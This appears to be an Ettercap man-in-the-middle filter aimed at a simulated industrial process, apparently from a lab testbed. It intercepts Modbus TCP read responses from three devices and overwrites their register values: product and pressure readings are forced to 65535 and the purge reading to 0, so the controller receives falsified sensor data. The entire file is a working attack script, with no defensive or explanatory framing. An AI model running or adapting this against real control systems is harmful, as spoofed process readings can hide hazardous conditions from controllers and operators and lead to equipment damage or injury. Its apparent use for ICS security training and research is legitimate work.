# manipulate product reading to 65535
# manipulate pressure reading to 65535
# manipulate a in purge reading to 0

# product
if (ip.src == '192.168.95.13' && ip.dst == '192.168.95.2') {
    if (tcp.src == 502 && DATA.data + 7 == 0x04) {
        DATA.data + 11 = 0xff;
        DATA.data + 12 = 0xff;
    }
}

# pressure
if (ip.src == '192.168.95.14' && ip.dst == '192.168.95.2') {
    if (tcp.src == 502 && DATA.data + 7 == 0x04) {
        DATA.data + 9 = 0xff;
        DATA.data + 10 = 0xff;
    }
}

# purge
if (ip.src == '192.168.95.15' && ip.dst == '192.168.95.2') {
    if (tcp.src == 502 && DATA.data + 7 == 0x04) {
        DATA.data + 9 = 0x00;
        DATA.data + 10 = 0x00;
    }
}
